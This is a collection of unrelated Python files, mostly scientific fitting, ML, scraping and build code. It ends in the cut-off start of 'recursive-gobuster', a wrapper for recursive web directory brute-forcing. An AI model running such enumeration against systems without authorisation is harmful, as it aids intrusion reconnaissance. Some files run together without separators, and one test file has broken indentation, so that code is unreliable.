    p[0] = amp, p[1] = phase in deg, p[2] = offset.
    Evaluates |p[0]| * sin(2*pi*(t + p[1])/360) + p[2].
    '''
    amp = np.abs(p[0])
    return amp*np.sin((t+p[1])/360*2*np.pi) + p[2]
def do_sin360period_fit(data, verbose = False):
    """Fit data to |amp|*sin(2*pi*(t+phase)/360) + offset, period fixed at 360.

    Returns beta = [amp, phase_deg, offset] with amp >= 0.
    """
    _func = sin360period_func
    Model = scipy.odr.Model(_func)
    Data = scipy.odr.RealData(data[:,0], data[:,1])
    # Peak-to-peak amplitude and midpoint offset as starting values.
    amp_guess = np.max(data[:,1]) - np.min(data[:,1])
    phase_guess = 0.0
    offset_guess = 0.5*(np.max(data[:,1]) + np.min(data[:,1]))
    if verbose:
        print('amp_guess = ', amp_guess)
        print('phase_guess = ', phase_guess)
        print('offset_guess = ', offset_guess)
    guess = [amp_guess, phase_guess, offset_guess]
    Odr = scipy.odr.ODR(Data, Model, guess, maxit = 10000000)
    # fit_type=2: ordinary least squares.
    Odr.set_job(fit_type=2)
    output = Odr.run()
    #output.pprint()
    beta = output.beta
    betastd = output.sd_beta
    # The model only uses |amp|; report it as positive.
    beta[0] = np.abs(beta[0])
    if verbose :
        fig, ax = plt.subplots()
        # print "poly", fit_np
        print("fit result amp: \n", beta[0])
        print("fit result phase: \n", beta[1])
        print("fit result offset: \n", beta[2])
        ax.plot(data[:,0], _func(beta, data[:,0]), "r--", lw = 2)
        ax.plot(data[:,0], data[:,1], "bo")
        # plt.plot(data[:,0], numpy.polyval(fit_np, data[:,0]), "r--", lw = 2)
        # ax.plot(data[:,0], _func([max_guess, min_guess, inflection_guess, sigma_guess ], data[:,0]), "g--", lw = 2)
        plt.tight_layout()
        plt.show()
    return beta
def general_logistic_func(p, t):
    '''
    Logistic (sigmoid) curve; only works for an "increasing" function.
    p[0] = max, p[1] = min, p[2] = inflection point, p[3] = sigma (approx)
    '''
    steepness = 0.5*np.pi/p[3]
    return p[0]/ (1 + math.e**(-steepness*(t-p[2]))) + p[1]
def do_logistic_fit(data, verbose = False):
    '''
    only works for "increasing" function
    p[0] = max
    p[1] = min
    p[2] = inflection point
    p[3] = sigma (approx)
    Fits general_logistic_func to data via ODR; returns beta.
    '''
    _func = general_logistic_func
    Model = scipy.odr.Model(_func)
    Data = scipy.odr.RealData(data[:,0], data[:,1])
    # Data extremes and x-midpoint as starting values.
    max_guess = np.max(data[:,1])
    min_guess = np.min(data[:,1])
    inflection_guess = np.mean(data[:,0])
    sigma_guess = 1
    if verbose:
        print('max_guess = ', np.max(data[:,1]))
        print('min_guess = ', np.min(data[:,1]))
        print('inflection_guess = ', np.mean(data[:,0]))
        print('steepness_guess = ', 1)
    Odr = scipy.odr.ODR(Data, Model, [max_guess, min_guess, inflection_guess, sigma_guess ], maxit = 10000000)
    # fit_type=2: ordinary least squares.
    Odr.set_job(fit_type=2)
    output = Odr.run()
    #output.pprint()
    beta = output.beta
    betastd = output.sd_beta
    if verbose :
        fig, ax = plt.subplots()
        # print "poly", fit_np
        print("fit result max: \n", beta[0])
        print("fit result min: \n", beta[1])
        print("fit result inflection point: \n", beta[2])
        print("fit result sigma: \n", beta[3])
        ax.plot(data[:,0], data[:,1], "bo")
        # plt.plot(data[:,0], numpy.polyval(fit_np, data[:,0]), "r--", lw = 2)
        ax.plot(data[:,0], _func(beta, data[:,0]), "r--", lw = 2)
        # ax.plot(data[:,0], _func([max_guess, min_guess, inflection_guess, sigma_guess ], data[:,0]), "g--", lw = 2)
        plt.tight_layout()
        plt.show()
    return beta
def error_func(p, t):
    """Abramowitz & Stegun 7.1.26 polynomial approximation of erf(t).

    The parameter *p* is unused; it exists so the function matches the
    (p, t) signature expected by the ODR fitting helpers.
    """
    # erf is odd: remember the sign and work with |t|.
    sign = np.where(t >= 0, 1, -1)
    t = abs(t)
    # Coefficients of the A&S 7.1.26 approximation.
    a1 = 0.254829592
    a2 = -0.284496736
    a3 = 1.421413741
    a4 = -1.453152027
    a5 = 1.061405429
    a6 = 0.3275911
    r = 1.0/(1.0 + a6*t)
    poly = (((((a5*r + a4)*r) + a3)*r + a2)*r + a1)*r
    y = 1.0 - poly*math.exp(-t*t)
    return sign*y # erf(-x) = -erf(x)
def gauss_func(p, t):
    '''
    Gaussian with area/center/width parameters:
    p[0] = a (area), p[1] = mu, p[2] = sigma.
    '''
    amplitude = p[0]*1/(math.sqrt(2*math.pi*(p[2]**2)))
    return amplitude*math.e**((-(t-p[1])**2/(2*p[2]**2)))
def do_gauss_fit(data, verbose = False,sigma_in_pxl=50):
    """Fit a Gaussian (gauss_func) to data via ODR.

    *sigma_in_pxl* sets the width starting guess in units of the sample
    spacing.  Returns beta = [a, mu, sigma].
    """
    Model = scipy.odr.Model(gauss_func)
    Data = scipy.odr.RealData(data[:,0], data[:,1])
    # Peak height, expected width, and peak position as starting values.
    a_guess = np.max(data[:,1])
    sigma_guess = sigma_in_pxl*np.absolute(data[0,0]-data[1,0])
    mu_guess = data[:,0][np.argmax(data[:,1])]
    Odr = scipy.odr.ODR(Data, Model, [a_guess,mu_guess, sigma_guess], maxit = 10000000)
    # fit_type=2: ordinary least squares.
    Odr.set_job(fit_type=2)
    output = Odr.run()
    #output.pprint()
    beta = output.beta
    betastd = output.sd_beta
    if verbose :
        fig, ax = plt.subplots()
        # print "poly", fit_np
        print("fit result a: \n", beta[0])
        print("fit result mu: \n", beta[1])
        print("fit result sigma: \n", beta[2])
        ax.plot(data[:,0], data[:,1], "bo")
        # plt.plot(data[:,0], numpy.polyval(fit_np, data[:,0]), "r--", lw = 2)
        ax.plot(data[:,0], gauss_func(beta, data[:,0]), "r--", lw = 2)
        plt.tight_layout()
        plt.show()
    # raw_input('next')
    return beta
def linear_func(p, t):
    """Straight line: p = [slope, intercept]."""
    slope, intercept = p[0], p[1]
    return slope * t + intercept
def do_linear_fit(data, verbose = False):
    """Fit a straight line (linear_func) to data via ODR.

    Returns beta = [slope, offset].
    """
    Model = scipy.odr.Model(linear_func)
    Data = scipy.odr.RealData(data[:,0], data[:,1])
    # Fixed starting guess; a line converges from almost anywhere.
    Odr = scipy.odr.ODR(Data, Model, [-2, 1], maxit = 10000)
    # fit_type=2: ordinary least squares.
    Odr.set_job(fit_type=2)
    output = Odr.run()
    #output.pprint()
    beta = output.beta
    betastd = output.sd_beta
    if verbose :
        fig, ax = plt.subplots()
        # print "poly", fit_np
        print("fit result [pxl/frame]: \n", beta[0])
        ax.plot(data[:,0], data[:,1], "bo")
        # plt.plot(data[:,0], numpy.polyval(fit_np, data[:,0]), "r--", lw = 2)
        ax.plot(data[:,0], linear_func(beta, data[:,0]), "r--", lw = 2)
        plt.tight_layout()
        plt.show()
    return beta
def quadratic_func(p, t):
    """Quadratic polynomial with coefficients p = [a, b, c]: a*t**2 + b*t + c."""
    a, b, c = p[0], p[1], p[2]
    return a*t**2 + b*t + c
def do_quadratic_fit(data, verbose = False):
    """Fit a quadratic (quadratic_func) to data via ODR.

    Returns beta = [a, b, c] for y = a*x**2 + b*x + c.
    """
    Model = scipy.odr.Model(quadratic_func)
    Data = scipy.odr.RealData(data[:,0], data[:,1])
    # Fixed starting guess.
    Odr = scipy.odr.ODR(Data, Model, [-10, -10, -2], maxit = 1000000)
    # fit_type=2: ordinary least squares.
    Odr.set_job(fit_type=2)
    output = Odr.run()
    #output.pprint()
    beta = output.beta
    betastd = output.sd_beta
    # print "poly", fit_np
    if verbose:
        fig, ax = plt.subplots()
        print("fit result y = %s x2 + %s x + %s " % (beta[0],beta[1],beta[2]))
        ax.plot(data[:,0], data[:,1], "bo")
        # plt.plot(data[:,0], numpy.polyval(fit_np, data[:,0]), "r--", lw = 2)
        ax.plot(data[:,0], quadratic_func(beta, data[:,0]), "r--", lw = 2)
        plt.tight_layout()
        plt.show()
    return beta
def cubic_func(p, t):
    """Cubic polynomial with coefficients p = [a, b, c, d]."""
    a, b, c, d = p[0], p[1], p[2], p[3]
    return a*t**3 + b*t**2 + c*t + d
def do_cubic_fit(data, verbose=False):
    """Fit a cubic (cubic_func) to data via ODR.

    Returns beta = [a, b, c, d] for y = a*x**3 + b*x**2 + c*x + d.
    """
    Model = scipy.odr.Model(cubic_func)
    Data = scipy.odr.RealData(data[:,0], data[:,1])
    # Fixed starting guess.
    Odr = scipy.odr.ODR(Data, Model, [-10, -10, -2, 1], maxit = 1000000)
    # fit_type=2: ordinary least squares.
    Odr.set_job(fit_type=2)
    output = Odr.run()
    #output.pprint()
    beta = output.beta
    betastd = output.sd_beta
    if verbose:
        fig, ax = plt.subplots()
        # print "poly", fit_np
        print("fit result y = %s x3 + %s x2 + %s x + %s " % (beta[0],beta[1],beta[2], beta[3]))
        ax.plot(data[:,0], data[:,1], "bo")
        # plt.plot(data[:,0], numpy.polyval(fit_np, data[:,0]), "r--", lw = 2)
        ax.plot(data[:,0], cubic_func(beta, data[:,0]), "r--", lw = 2)
        plt.tight_layout()
        plt.show()
    return beta
def polynomial_func(beta, t):
    '''
    Evaluate a polynomial whose coefficients are given highest power first
    (numpy polyfit order).  test : works
    '''
    ascending = beta[::-1]  # polyval wants lowest power first
    return np.polynomial.polynomial.polyval(t, ascending)
def do_polynomial_fit(data, degree, verbose = False):
    '''
    Least-squares polynomial fit of the given degree to data[:,0]/data[:,1].
    test works
    Returns the coefficients highest power first (numpy polyfit order).
    '''
    print('data in fitting:')
    print('x:')
    print(data[:,0])
    print('y:')
    print(data[:,1])
    # polyfit returns ascending coefficients; reverse to highest-first.
    p = np.polynomial.polynomial.polyfit(data[:,0], data[:,1], degree)
    beta = p[::-1]
    print('result of fitting:')
    print('x:')
    print(data[:,0])
    print('y:')
    print(polynomial_func(beta, data[:,0]))
    if verbose:
        fig, ax = plt.subplots()
        # BUGFIX: corrected the typo "fount" in the diagnostic message.
        print('found polynomial coefficients an ... a0:')
        print(beta)
        ax.plot(data[:,0], data[:,1], "bo")
        ax.plot(data[:,0], polynomial_func(beta, data[:,0]), "r--", lw = 2)
        plt.tight_layout()
        plt.show()
    return beta
def exp_func(p, t):
    """Exponential: p = [amplitude, rate, offset], i.e. p[0]*e**(p[1]*t) + p[2]."""
    amp, rate, offset = p[0], p[1], p[2]
    return amp * math.e**(t*rate) + offset
def do_exp_fit(data, verbose = False):
    """Fit an exponential (exp_func) to data via ODR.

    Returns beta = [amplitude, rate, offset] for y = A*e**(rate*x) + offset.
    """
    Model = scipy.odr.Model(exp_func)
    Data = scipy.odr.RealData(data[:,0], data[:,1])
    # Fixed starting guess: gentle decay with a small offset.
    Odr = scipy.odr.ODR(Data, Model, [+10, -0.0010, 3], maxit = 1000000)
    # fit_type=2: ordinary least squares.
    Odr.set_job(fit_type=2)
    output = Odr.run()
    #output.pprint()
    beta = output.beta
    betastd = output.sd_beta
    # print "poly", fit_np
    if verbose:
        fig, ax = plt.subplots()
        print("fit result y = %s e^(x * %s) + %s" % (beta[0],beta[1],beta[2]))
        ax.plot(data[:,0], data[:,1], "bo")
        # plt.plot(data[:,0], numpy.polyval(fit_np, data[:,0]), "r--", lw = 2)
        ax.plot(data[:,0], exp_func(beta, data[:,0]), "r--", lw = 2)
        plt.tight_layout()
        plt.show()
    return beta
def main(row = [1353., 1353., 1353.],
         col = [980., 987., 995.],
         frame = [87,86,85],
         ):
    """Demo: fit a line to the radial distance of three tracked points."""
    dist = [math.sqrt(row[i]**2 + col[i]**2) for i in range(len(row))]
    samples = np.zeros(shape=(len(row), 2))
    samples[:, 0] = np.array(frame)
    samples[:, 1] = np.array(dist)
    do_linear_fit(samples, verbose=True)


if __name__ == "__main__":
    main()
|
from flask import Flask,render_template
from os import walk
# Serve the broadcast-drama folder directly as static files under /yjw.
app=Flask(__name__,static_folder="Z:\电影\三体-广播剧",static_url_path="/yjw")
@app.route("/")
def wlx():
    """Walk the drama folder and render mood.html with the relative paths."""
    s = []
    for root, dirs, files in walk("Z:\电影\三体-广播剧"):
        for file in files:
            # Build a forward-slash path relative to the drama folder root.
            full_path = (root + "\\" + file).replace("\\", "/")
            rel_path = full_path.replace("Z:/电影/三体-广播剧/", "")
            print(rel_path)
            s.append(rel_path)
    return render_template("mood.html", s=s)
# Run the Flask development server when executed directly.
if __name__ == '__main__':
    app.run()
# fixed
|
import os
from os import path
import sys
# Make the project-local site-packages importable before the remaining imports.
tld = path.realpath(path.join(path.dirname(__file__), '../..'))
sys.path.append(path.join(tld, 'lib/python3.5/site-packages'))
import glob
import subprocess
from distutils.core import setup
from distutils.extension import Extension
from Cython.Build import cythonize
here = os.path.dirname(os.path.realpath(__file__))
# C++ sources that make up the jamovi.core extension, plus the Cython wrapper.
source_files = glob.glob('./jamovi/core/*.cpp')
source_files.extend(glob.glob('./jamovi/common/*.cpp'))
source_files.append('./jamovi/core.pyx')
# exclude the generated core.cpp (made from core.pyx)
source_files = list(filter(lambda file: not file.endswith('core.cpp'), source_files))
include_dirs = [
    path.join(here, './jamovi/core'),
    path.join(here, './jamovi/common'),
    path.join(tld, 'include') ]
# Platform-specific boost linkage for the extension build.
if os.name == 'nt':  # windows
    libraries = [ "libboost_filesystem-vc140-mt-1_60", "libboost_system-vc140-mt-1_60" ]
    library_dirs = [ tld + '/lib/libvc' ]
    extra_compile_args = ["/D", "UNICODE"]
elif os.uname()[0] == "Linux":
    libraries = [ "boost_filesystem", "boost_system" ]
    library_dirs = [ ]
    extra_compile_args = [ ]
else:
    # presumably macOS -- the Frameworks path suggests it; TODO confirm
    libraries = [ "boost_filesystem-mt", "boost_system-mt" ]
    library_dirs = [ tld + '/../Frameworks' ]
    extra_compile_args = [ ]
# Single Cython extension combining the C++ core with the core.pyx wrapper.
extensions = [
    Extension('jamovi.core',
              source_files,
              include_dirs=include_dirs,
              libraries=libraries,
              library_dirs=library_dirs,
              extra_compile_args=extra_compile_args,
              language="c++",
              undef_macros=[ "NDEBUG" ])
]
# Regenerate the protobuf bindings (server/jamovi_pb2) before packaging.
here = path.abspath(path.dirname(__file__))
proto_dir = path.join(here, 'jamovi/server')
rc = subprocess.call([
    'protoc',
    '--proto_path=' + proto_dir,
    '--python_out=' + proto_dir,
    path.join(proto_dir, 'jamovi.proto')])
if rc != 0:
    # FIX: idiomatic raise — the original wrapped the exception in redundant
    # parentheses: raise(RuntimeError(...)).
    raise RuntimeError('protoc failed!')
# Package metadata and build definition; the extension is compiled with the
# platform-specific settings assembled above.
setup(
    name='jamovi',
    version='0.1.0',
    description='jamovi statistical software',
    long_description='jamovi statistical software',
    url='https://jamovi.org',
    author='Jonathon Love',
    author_email='jon@thon.cc',
    license='AGPL3',
    classifiers=[
        'Development Status :: 3 - Alpha',
        'Intended Audience :: Science/Research',
        'Topic :: Scientific/Engineering',
        'License :: OSI Approved :: GNU Affero General Public License v3 or later (AGPLv3+)',
        'Programming Language :: Python :: 3.4',
        'Programming Language :: Python :: 3.5',
    ],
    keywords='statistics analysis spreadsheet',
    packages=['jamovi.server', 'jamovi.core', 'jamovi.server.formatio', 'jamovi.server.utils'],
    ext_modules=cythonize(
        extensions,
        language="c++"),
    install_requires=[
        'tornado',
        'protobuf',
        'nanomsg',
        'PyYAML'],
    extras_require={
        'dev': ['cython'],
        'test': ['flake8'],
    },
    # Ship the .proto definition alongside the server package.
    package_data={
        'jamovi.server': [ 'jamovi.proto' ]
    },
    data_files=[
        ('jamovi/server/resources/client', glob.glob('jamovi/server/resources/client/*.*')),
        ('jamovi/server/resources/client/assets', glob.glob('jamovi/server/resources/client/assets/*.*'))
    ],
    entry_points={
        'console_scripts': [
            'jamovi-server=jamovi.server:start',
        ],
    },
)
|
from typing import Union
import httpx
import parsel
from core.utils import get_converted_currency
from schemas.search import Query
from .abstract import AbstractProvider
class MashinaKGProvider(AbstractProvider):
    """Search provider that scrapes car listings from mashina.kg pages."""

    def get_validated_price(self, value: str) -> Union[str, None]:
        """Strip spaces and the leading currency symbol; None for empty input."""
        if not value:
            return None
        return value.replace(" ", "")[1:]

    async def job(self, query: Query):
        """Fetch the search page for *query* and return the scraped results."""
        search_url = f"{self.url}/search/{query.brand.lower()}/{query.model.lower()}"
        async with httpx.AsyncClient() as client:
            response = await client.get(search_url)
            html = parsel.Selector(text=response.text)
            results = []
            for car in html.css(".table-view-list .list-item > a"):
                raw_price = car.css("div > p > strong::text").get()
                price = await get_converted_currency(
                    self.get_validated_price(raw_price),
                    from_currency="USD",
                    to_currency="KGS"
                )
                thumbnail = car.css(".thumb-item-carousel")[0].css("img")[0]
                results.append(self.result(
                    url=f"{self.url}{car.xpath('@href').get()}",
                    price=price,
                    image=thumbnail.xpath("@data-src").get()
                ))
            return results
|
import torch
from torch import nn
import torch.nn.functional as F
class ArcFace(nn.Module):
    """Additive Angular Margin loss (ArcFace), https://arxiv.org/pdf/1801.07698.pdf

    Expects *outputs* to be cosine logits in [-1, 1] (embedding/class-centre
    cosines); applies the angular margin to the target logit, rescales, and
    takes cross-entropy.
    """

    def __init__(self, margin=0.5, scale=64):
        """:param margin: additive angle m (radians); :param scale: logit scale s."""
        super(ArcFace, self).__init__()
        self.margin = margin
        self.scale = scale
        # FIX: hoisted out of forward() — the loss module is stateless, so
        # there is no reason to construct a new instance on every call.
        self.criterion = nn.CrossEntropyLoss()

    def forward(self, outputs, targets):
        # cos(theta) of the target class for each sample.
        original_target_logits = outputs.gather(1, torch.unsqueeze(targets, 1))
        # acos diverges near the domain boundary -> shrink slightly (*0.999999).
        original_target_logits = original_target_logits * 0.999999
        thetas = torch.acos(original_target_logits)
        # cos(theta + m): the margin-penalised target logit.
        marginal_target_logits = torch.cos(thetas + self.margin)
        one_hot_mask = F.one_hot(targets, num_classes=outputs.shape[1])
        # Replace only the target-class logit with its penalised version.
        diff = marginal_target_logits - original_target_logits
        expanded = diff.expand(-1, outputs.shape[1])
        outputs = self.scale * (outputs + (expanded * one_hot_mask))
        return self.criterion(outputs, targets)
#!/usr/bin/env python3
# Import standard modules ...
import unittest
# Import my modules ...
try:
import pyguymer3
except:
raise Exception("\"pyguymer3\" is not installed; you need to have the Python module from https://github.com/Guymer/PyGuymer3 located somewhere in your $PYTHONPATH") from None
# Define a test case ...
class MyTestCase(unittest.TestCase):
    """Smoke tests for a handful of pyguymer3 utility functions."""

    # Define a test ...
    def test_convertBytesToPrettyBytes(self):
        # 16 MiB in bytes should round-trip to (16.0, "MiB").
        self.assertSequenceEqual(
            pyguymer3.convert_bytes_to_pretty_bytes(16.0 * 1024.0 * 1024.0),
            (16.0, "MiB"),
        )

    # Define a test ...
    def test_convertPrettyBytesToBytes(self):
        self.assertEqual(
            pyguymer3.convert_pretty_bytes_to_bytes("16.0 MiB"),
            16.0 * 1024.0 * 1024.0,
        )

    # Define a test ...
    def test_findIntegerDivisors(self):
        # Proper divisors only: 1 and 12 themselves are excluded.
        self.assertSequenceEqual(
            pyguymer3.find_integer_divisors(12),
            [2, 3, 4, 6],
        )

    # Define a test ...
    def test_interpolate(self):
        # Midpoint of the segment (1,3)-(3,1)... presumably (x1,y1,x2,y2,x);
        # TODO confirm the argument order against pyguymer3's docs.
        self.assertEqual(
            pyguymer3.interpolate(1.0, 3.0, 2.0, 4.0, 2.0),
            3.0,
        )

    # Define a test ...
    def test_intersection(self):
        # Two crossing diagonals of the unit-ish square meet at (2, 2).
        self.assertSequenceEqual(
            pyguymer3.intersection(
                (1.0, 3.0),
                (3.0, 1.0),
                (1.0, 1.0),
                (3.0, 3.0),
            ).tolist(),
            [2.0, 2.0],
        )

    # Define a test ...
    def test_makePathSafe(self):
        self.assertEqual(
            pyguymer3.make_path_safe(".what do you think of this path?"),
            " .what do you think of this path",
        )
# Use the proper idiom in the main module (keeps the tests from running on a
# bare import, e.g. under multiprocessing's spawn start method) ...
# NOTE: See https://docs.python.org/3.11/library/multiprocessing.html#the-spawn-and-forkserver-start-methods
if __name__ == "__main__":
    # Run the tests ...
    unittest.main()
|
from adxl345 import ADXL345
from time import sleep
# Poll the accelerometer once a second and print the three axes.
adxl345 = ADXL345()
while True:
    # True presumably selects G units rather than raw counts — TODO confirm
    # against the adxl345 library.
    axes = adxl345.getAxes(True)
    # FIX: the original used the Python 2 print *statement*, which is a
    # SyntaxError on Python 3; the function-call form works on both.
    print("x= %.3fG\ty=%.3fG\tz=%.3fG" % (axes['x'], axes['y'], axes['z']))
    sleep(1)
|
import sys
import os
import gevent
def watch_modules(callback):
    """Poll the source files of all loaded modules forever; invoke *callback*
    whenever any of them changes on disk. Never returns."""
    mtimes = {}
    while True:
        for name, module in list(sys.modules.items()):
            if module is None or not hasattr(module, '__file__'):
                continue
            # .pyc -> .py: strip the trailing 'c' from compiled-file paths.
            source_path = os.path.abspath(module.__file__).rstrip('c')
            try:
                mtime = os.stat(source_path).st_mtime
            except OSError:
                continue
            if name in mtimes and mtimes[name] != mtime:
                callback()
            mtimes[name] = mtime
        gevent.sleep(1)
def set_source_change_callback(callback):
    """Spawn a background greenlet that fires *callback* whenever a loaded
    module's source file changes on disk."""
    gevent.spawn(watch_modules, callback)
|
#Title: Pie Graph
#Author: Hrishikesh H Pillai
#Date: 11-11-2019
import matplotlib.pyplot as plt
# Draw a pie chart of the four sample values.
values = [12, 34, 50, 43]
plt.pie(values)
plt.show()
from itertools import chain, combinations, product
# Method to extract a value from nested tuple recursively
def extract_elem_from_tuple(my_var):
    """Recursively flatten a nested tuple, yielding leaf values in order.

    FIXES: isinstance() instead of type() == tuple; `yield from` instead of a
    nested loop whose variable shadowed the outer `val`.
    """
    for val in my_var:
        if isinstance(val, tuple):
            yield from extract_elem_from_tuple(val)
        else:
            yield val
# Field values (would normally be read from a yaml file).
lst_brand = ['Brand-X', 'Brand-Y', 'Brand-A']
lst_platform = ['98', 'NT', '2000', 'XP']
lst_version = [1, 2]

# All pairwise combinations over the concatenated fields.
lst_complete = list(chain(lst_brand, lst_platform))
print(lst_complete)
combination_lst = list(combinations(lst_complete, 2))
print(len(combination_lst), combination_lst)

# Keep only mixed pairs: drop brand/brand and platform/platform combinations.
temp_combination_lst = [
    pair for pair in combination_lst
    if not (pair[0] in lst_brand and pair[1] in lst_brand)
    and not (pair[0] in lst_platform and pair[1] in lst_platform)
]
print(len(temp_combination_lst), temp_combination_lst)

# Flatten each (possibly nested) tuple into a plain list.
lst_out = [list(extract_elem_from_tuple(pair)) for pair in temp_combination_lst]
print('>>>>>>>>>>>>>>>>', lst_out)

# Count how often the first brand occurs across all combinations.
flatten_lst = list(chain(*lst_out))
occurence_count = flatten_lst.count(lst_brand[0])
print('Count of item in field-1: {0}'.format(occurence_count))
print(lst_out)

# Cartesian Product
# out_lst = list(product(temp_combination_lst, lst_version))
# print(len(out_lst), out_lst)
# Expanding a nested tuple
# lst_out = []
# for every_item in out_lst:
#     out = list(extract_elem_from_tuple(every_item))
#     lst_out.append(out)
# print('>>>>>>>>>>>>>>>>', lst_out)
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from . import ConvLSTMCell, Sign
class EncoderCell(nn.Module):
    """Recurrent image encoder: a strided conv followed by three ConvLSTM
    layers, each halving the spatial resolution (stride 2)."""

    def __init__(self):
        super(EncoderCell, self).__init__()
        # 3 -> 64 channels, stride 2.
        self.conv = nn.Conv2d(3, 64, kernel_size=3, stride=2, padding=1,
                              bias=False)
        # 64 -> 256 -> 512 -> 512 channels; each rnn also halves H and W.
        self.rnn1 = ConvLSTMCell(64, 256, kernel_size=3, stride=2, padding=1,
                                 hidden_kernel_size=1, bias=False)
        self.rnn2 = ConvLSTMCell(256, 512, kernel_size=3, stride=2, padding=1,
                                 hidden_kernel_size=1, bias=False)
        self.rnn3 = ConvLSTMCell(512, 512, kernel_size=3, stride=2, padding=1,
                                 hidden_kernel_size=1, bias=False)

    def forward(self, input, hs):
        """One encoding step: returns (features, updated hidden states)."""
        h1, h2, h3 = hs
        x = self.conv(input)
        h1 = self.rnn1(x, h1)
        # Each rnn state is a pair; element [0] is fed to the next layer.
        x = h1[0]
        h2 = self.rnn2(x, h2)
        x = h2[0]
        h3 = self.rnn3(x, h3)
        x = h3[0]
        return x, [h1, h2, h3]

    def create_zeros(self, dims, gpu, grad):
        # Zero-initialised (hidden, cell) state pair, optionally on the GPU.
        tmp = (torch.zeros(*dims, requires_grad=grad),
               torch.zeros(*dims, requires_grad=grad))
        tmp = (tmp[0].cuda(), tmp[1].cuda()) if gpu else tmp
        return tmp

    def create_hidden(self, batch_size, gpu=True, grad=True):
        # Spatial sizes 8/4/2 are consistent with 32x32 inputs — TODO confirm.
        h1 = self.create_zeros([batch_size, 256, 8, 8], gpu, grad)
        h2 = self.create_zeros([batch_size, 512, 4, 4], gpu, grad)
        h3 = self.create_zeros([batch_size, 512, 2, 2], gpu, grad)
        return [h1, h2, h3]
class Binarizer(nn.Module):
    """Project features to 32 code channels, squash with tanh, then apply the
    Sign binarization (see Sign)."""

    def __init__(self):
        super(Binarizer, self).__init__()
        self.conv = nn.Conv2d(512, 32, kernel_size=1, bias=False)
        self.sign = Sign()

    def forward(self, input):
        return self.sign(torch.tanh(self.conv(input)))
class DecoderCell(nn.Module):
    """Recurrent image decoder: four ConvLSTM layers, each followed by a 2x
    pixel shuffle that trades channels for spatial resolution."""

    def __init__(self):
        super(DecoderCell, self).__init__()
        # 32 code channels -> 512 features.
        self.conv1 = nn.Conv2d(32, 512, kernel_size=1, stride=1, padding=0,
                               bias=False)
        # Input channels shrink by 4x between rnns: pixel_shuffle(2) divides
        # the channel count by 4 while doubling H and W.
        self.rnn1 = ConvLSTMCell(512, 512, kernel_size=3, stride=1, padding=1,
                                 hidden_kernel_size=1, bias=False)
        self.rnn2 = ConvLSTMCell(128, 512, kernel_size=3, stride=1, padding=1,
                                 hidden_kernel_size=1, bias=False)
        self.rnn3 = ConvLSTMCell(128, 256, kernel_size=3, stride=1, padding=1,
                                 hidden_kernel_size=3, bias=False)
        self.rnn4 = ConvLSTMCell(64, 128, kernel_size=3, stride=1, padding=1,
                                 hidden_kernel_size=3, bias=False)
        # 32 -> 3 output channels (RGB).
        self.conv2 = nn.Conv2d(32, 3, kernel_size=1, stride=1, padding=0,
                               bias=False)

    def forward(self, input, hs):
        """One decoding step: returns (image, updated hidden states).

        The final tanh/2 keeps the output in (-0.5, 0.5).
        """
        h1, h2, h3, h4 = hs
        x = self.conv1(input)
        h1 = self.rnn1(x, h1)
        # Each rnn state is a pair; element [0] feeds the next layer.
        x = h1[0]
        x = F.pixel_shuffle(x, 2)
        h2 = self.rnn2(x, h2)
        x = h2[0]
        x = F.pixel_shuffle(x, 2)
        h3 = self.rnn3(x, h3)
        x = h3[0]
        x = F.pixel_shuffle(x, 2)
        h4 = self.rnn4(x, h4)
        x = h4[0]
        x = F.pixel_shuffle(x, 2)
        x = torch.tanh(self.conv2(x)) / 2
        return x, [h1, h2, h3, h4]

    def create_zeros(self, dims, gpu, grad):
        # Zero-initialised (hidden, cell) state pair, optionally on the GPU.
        tmp = (torch.zeros(*dims, requires_grad=grad),
               torch.zeros(*dims, requires_grad=grad))
        tmp = (tmp[0].cuda(), tmp[1].cuda()) if gpu else tmp
        return tmp

    def create_hidden(self, batch_size, gpu=True, grad=True):
        # Mirrors the encoder's 2x2 bottleneck; sizes double layer by layer.
        h1 = self.create_zeros([batch_size, 512, 2, 2], gpu, grad)
        h2 = self.create_zeros([batch_size, 512, 4, 4], gpu, grad)
        h3 = self.create_zeros([batch_size, 256, 8, 8], gpu, grad)
        h4 = self.create_zeros([batch_size, 128, 16, 16], gpu, grad)
        return [h1, h2, h3, h4]
|
"""
Title: recursive-gobuster
Date: 20190110
Author: epi <epibar052@gmail.com>
https://epi052.gitlab.io/notes-to-self/
Tested on:
linux/x86_64 4.15.0-43-generic
Python 3.6.6
pyinotify 0.9.6
"""
import time
import signal
import shutil
import argparse
import tempfile
import subprocess
from pathlib import Path
import pyinotify
active_scans = list()
completed_scans = list()
class EventHandler(pyinotify.ProcessEvent):
    """
    Handles notifications and takes actions through specific processing methods.
    For an EVENT_TYPE, a process_EVENT_TYPE function will execute.
    """

    def __init__(self, *args, **kwargs):
        # NOTE(review): args/kwargs are also forwarded to
        # pyinotify.ProcessEvent.__init__ — presumably it tolerates the extra
        # keywords; confirm against the pyinotify API.
        super().__init__(*args, **kwargs)
        self.user = kwargs.get("user")              # -U basic-auth username (or None)
        self.proxy = kwargs.get("proxy")            # -p proxy url (or None)
        self.status = kwargs.get("status")          # include status codes in output
        self.tmpdir = kwargs.get("tmpdir")          # watched directory for scan output
        self.devnull = kwargs.get("devnull")        # suppress gobuster stderr
        self.threads = kwargs.get("threads")        # -t thread count (string)
        self.version = kwargs.get("version")        # gobuster major version (2 or 3)
        self.password = kwargs.get("password")      # -P basic-auth password (or None)
        self.wordlist = kwargs.get("wordlist")      # -w wordlist path
        self.extensions = kwargs.get("extensions")  # -x comma-separated extensions
        # target is mutated as recursion proceeds; original_target is kept for
        # naming the final log file in cleanup().
        self.target = self.original_target = kwargs.get("target")

    def _normalize_targetname(self, tgt: str) -> str:
        """ Returns a string representing a target URL that is compatible with linux filesystem naming conventions.
        Forward slashes (/) are not allowed in linux file names. This function simply replaces them with an underscore.
        Args:
            tgt: target url i.e. http://10.10.10.112/images/
        Returns:
            normalized target url i.e. http:__10.10.10.112_images_
        """
        return tgt.replace("/", "_")

    def run_gobuster(self, target: str) -> None:
        """ Runs gobuster in a non-blocking subprocess.
        The function is pretty opinionated about options fed to gobuster. Removing the -e, or -n will likely break
        functionality of the script. The other options are either configurable via command line options, or can be
        manipulated without any adverse side-effects.
        Hard-coded options/args
            -q
                Don't print the banner and other noise
            -e
                Expanded mode, print full URLs
            -k
                Skip SSL certificate verification
        Args:
            target: target url i.e. http://10.10.10.112/images/
        """
        normalized_target = self._normalize_targetname(target)
        command = ["gobuster"]
        if self.version == 3:
